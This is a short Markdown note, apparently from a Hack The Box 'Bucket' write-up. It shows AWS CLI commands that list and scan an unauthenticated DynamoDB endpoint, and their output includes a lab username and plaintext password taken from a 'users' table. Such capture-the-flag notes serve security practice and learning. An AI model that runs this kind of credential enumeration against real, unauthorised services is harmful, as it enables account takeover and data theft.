Skip to content

Latest commit

 

History

History
19 lines (17 loc) · 343 Bytes

动态数据库.md

File metadata and controls

19 lines (17 loc) · 343 Bytes
列表
$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables        

{
    "TableNames": [
        "users"
    ]
}
枚举表格内容
$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
  "password": {
    "S": "Management@#1@#"
  },
  "username": {
    "S": "Mgmt"
  }
}